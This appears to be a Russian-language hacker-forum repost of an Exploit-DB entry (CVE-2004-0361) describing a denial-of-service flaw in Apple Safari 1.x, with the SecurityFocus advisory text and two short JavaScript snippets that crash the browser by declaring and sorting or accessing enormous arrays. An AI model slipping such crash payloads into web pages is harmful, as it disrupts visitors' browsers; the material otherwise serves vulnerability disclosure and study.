Exploit Apple Safari 1.x - Large JavaScript Array Handling Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23793
Проверка EDB
  1. Пройдено
Автор
KANG
Тип уязвимости
DOS
Платформа
OSX
CVE
cve-2004-0361
Дата публикации
2004-03-06
Код:
source: https://www.securityfocus.com/bid/9815/info

Apple Safari Web Browser is reported to be prone to a security vulnerability related to handling of large JavaScript arrays (with 99999999999999999999999 or 0x23000000 elements). By declaring such an array and then attempting to access it, it may be possible to cause a browser crash.

This issue is likely due to memory corruption but it is not known if it could be further exploitable to execute arbitrary code.

var a = new Array(99999999999999999999999);
a[0+5]="AAAAA";

and:
var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));
 
Источник
www.exploit-db.com

Похожие темы